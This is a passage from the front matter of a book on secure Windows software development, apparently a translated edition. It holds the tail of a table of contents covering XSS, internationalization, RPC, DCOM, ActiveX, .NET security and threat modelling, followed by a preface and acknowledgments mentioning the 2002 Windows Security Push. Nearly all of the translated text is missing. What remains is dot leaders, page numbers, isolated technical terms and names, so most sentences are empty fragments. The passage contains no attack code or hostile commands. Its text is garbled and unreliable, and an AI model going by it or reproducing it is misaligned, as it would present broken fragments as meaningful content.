XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
HTML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 363
innerText . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
HttpOnly cookie Internet Explorer 6 SP1 . . . . . . . . . . 364
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
<FRAME SECURITY> Internet Explorer . . . . . . . . . . . . . . . . . . . . . . . . . 367
ValidateRequest ASP.NET 1.1 . . . . . . . . . . . . . . . . . . . . . . . . . . 367
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
, HTML
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369

XIII

XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
 eval() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
HTTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
ISAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
cookie . . . . . . . . . . . . . . . . . . . . . . . . 375
SSL/TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376

14

377

I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
 I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
LCMapString . . . . . . . . . . . . . . . . . 381
CreateFile . . . . . . . . 381
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
MultiByteToWideChar MB_PRECOMPOSED
MB_ERR_INVALID_CHARS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
WideCharToMultiByte WC_NO_BEST_FIT_CHARS . . . . . . . . . . . . . . . . . . . . . . . 382
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387

I I I



15

389
390

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
, . . . . . 405
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
. . . . . . . . . . . . . . . . . . . 406
. . . . . . . . . . . . . . . . . . . . . . 406

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
IP . . . . . . . . . . . . . . . 407
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407

XIV

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
IPv6 ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410

16

RPC, ActiveX- DCOM

411

RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
/robust MIDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
[range] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
. . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . 425
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
. . . . . . . . . . . . . . . . . . . . . . . . . . . 428
RPC . . . . . . . . . . . . . . 429
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
ActiveX,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
SFI SFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446

17

447

, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . 461
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 462

18

.NET

463

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
: FxCop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466

XV

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467
ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 472
Demand Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Demand LinkDemand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
 LinkDemand . . . . . . . . . . . . . . . . . . . . . 477
SuppressUnmanagedCodeSecurityAttribute: . . . . . . 478
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
XML . . . . . . . 481
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484

ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488

I V


19

491
492

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 496
, . . . . . . . . 497
STRIDE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511

XVI

. . . . . . . . . . . . . . . . . . . . . . . . . 527
/ . . . . . . . . . . . . . . . . . . . . . . . . . . . 528
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 530
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 534

20

535

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545

21

546

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 556
Windows Installer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 558

22

559

. . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 563
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 565
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
, . . . . . . . . . . . . . . 566
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566

XVII

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 578

23

579

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 580
, . . . . . . . . . . . . . . . . . . . . . . . . . . 580
. . . . . . . . . . . . . . . . . . . . . . . . . . . 581
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 583

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 587
IRP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 589
. . . . . . . . . . . . . . . . . . . . . . . 590
. . . . . . . . . . . . . . . . . . . . . . . . . . . 590
, . . . . 590
CreateProcess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 591
NULL lpApplicationName . . . . . . . . . . . . . . . . . . 592
lpCommandLine . . . . . . . . 592
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
\Program Files . . . . . . . . 594
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 594
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 596
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 597
EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 600
. . . . . . . . . . . . . . . . . . . . . . . . . . . 601
, , . . . . . . . . . . . . . . . 601
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
SID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
_alloca . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
ATL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 605
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606

XVIII

DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 607
C/C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 608

24

609

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 610
. . . . . . . . . . . . . . . . . . . . . . . 611

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 611
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 613
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 616
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
, , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 620

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 622
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 623

API-

625
626

API, . . . . . . . . . . . . . . . . . . . . . . . . . . . 627
API, . . . . . . . . . . . . 629
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 630
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API, DoS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 633
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 634

636

643

XIX

645

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 645
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
ActiveX, COM DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648

650

652

653

658

671

2002 . Microsoft
Windows . 
, Windows .NET Server 2003.
Windows Security Push ( )
, 
,
.
Windows, ,
, Windows
Security Push, Microsoft,
SQL Server, Office, Exchange, Systems Management Server, Visual Studio .NET,
.NET (CLR) .
Windows Security Push ( 
) , 15 2002 . 
,
, , 
.
Microsoft,
, :
, . 
.
, 
, , 
.
, . , 
.
.
.
, .
,  : 
, , 
, ,
.
:
, , .
, ,
. 
Web, ,
.

XXI

, , ,

. 
.
!
, . 

, .

. , 
, .
: . 
, 
, 
.
, ,

. ,
,
, , .
, , , 
, ,
, . ,
Microsoft Windows .NET Server 2003 , 
, , 
. .


, , 
. , Web Win32
Microsoft .NET Framework.
, ,
.
, Microsoft,
. , 
Microsoft,
, .
, , Windows 
. , ACL, 
Everyone, World Writable UNIX
,  
.

XXII


. 1 (
14) , , 
,
.
2 3. 2
( 514) ,
(
) . 3
( 15 18), 
.NET.
4 ( 19 24).
, : ,
, .
23 , 
, .
5 API,
, , 
, 
.
, 
,
. 
. , ,
.


Web Microsoft
Press, (http://www.microsoft.com/mspress/books/5957.asp).
, Companion Content
. Web Companion Content 
Microsoft Press
Support. ,
. . 
My Documents\Microsoft Press\Secureco2.
.


C C++; Microsoft Visual
Studio .NET, 
, Microsoft Visual C++ 6.0. Perl 
ActiveState Perl 5.6 ActivateState Visual Perl 1.0 (http://www.activestate.com).

XXIII

Microsoft VBScript JScript Windows Scripting Host,


Windows 2000 . SQL 
Microsoft SQL Server 2000. , Visual Basic .NET Visu
al C# Visual Studio .NET.

Windows 2000, 
. Safer
7 UTF8 11 Windows XP Windows .NET Server.
, 
.


, , 
. Microsoft Press

http://mspress.microsoft.com/support/.
, 
Microsoft Press http://www.microsoft.com/mspress/
support/search.asp.

,
. 
, , .
Microsoft Press, 
(Danielle Bird) ,
, (Devon Musgrave) 
,
(Brian Johnson) , 
. (Kerri DeVault)
(Rob Nance) .

. Microsoft:
(Saji Abraham), (mit Akkus ), (Doug Bayer),
(Tina Bird), (Mike Blaszczak), (Grant Bolitho),
(Christopher Brumme), (Neill Clift),
(David Cross), (Scott Culp), (Mike Danseglio),
(Bhavesh Doshi), (Ramsey Dow), (Werner Dreyer),
(Kedar Dubhashi), (Patrick Dussud), (Vadim
Eydelman), (Scott Field), (Cyrus Gray),
(Brian Grunkemeyer), (Caglar Gunyakti), (Ron Jacobs),
(Jesper Johansson), (Willis Johnson),
(Loren Kohnfelder), (Sergey Kuzin), (Mike Lai),
(Bruce Leban), Yung (YungShin Lin) Bala ,

XXIV

(Steve Lipner), (Eric Lippert), (Matt Lyons),


(Erik Olson), (Dave Quick), (Art Shelest),
(Daniel Sie), (Frank Swiderski), (Matt Thomlinson),
(Chris Walker), (Landy Wang), (Jonathan
Wilkins) (Mark Zbikowski).
Windows , 
, 
!
, 
, 
. (Brandon Bray)
(Raymond Fowkes)
. (Dave Ross), (Tom Gallagher)
(Richie Lai) Web,
 . (John McConnell), 
 (Mohammed ElGammal) (Julie Bennett)
,
. .NET 
, ;
. (Adrian Oney)
(Peter Viscarola) Open Systems Resources Inc. 
.
(J.C. Cannon) 
. , (Ken Jones), (Todd Stedl), (David
Wright), (Richard Carey) (Everett McKay) 
, . 

(Ramsey Dow)
PowerPoint (Neill Clift). 
, 
SO_EXCLUSIVEADDR, , , 
Microsoft Knowledge Base.

.
, 
: (Eli Allen), (John Biccum),
(Thomas Deml),  (Monica EnePietrosanu), 
(Sean Finnegan), (Tim Fleehart), (Damian Haase),
(David Hubbard), (Louis Lafreniere),
(Brian LaMacchia), (John Lambert), (Lawrence Lan
dauer), (Paul Leach), (Terry Leeper), (Rui Maximo),
(Daryl Pecelj), (Jon Pincus), Rain
Forest Puppy, (Fritz Sands), (Eric Schultze), 
(Alex Stockton), (Hank Voight), (Richard Ward),
(Richard Waymire) (Mark Zhou).

XXV

, Microsoft, , 
. (Peter Gutmann),
(Steve Hayr) Accenture, (Christo
pher W. Klaus) Internet Security Systems, (John Pescatore)
Gartner Inc., (Herbert H. Thompson) 
(James A. Whittaker) Florida Tech , , (Chris Wysopal)
Weld Pond @Stake.
: Microsoft
, 
. !

, 
, 
, 
, 
.
, 

, 
, ,
.
: Microsoft.com

, , 
. 
, ,
, : 
, , 
. ,
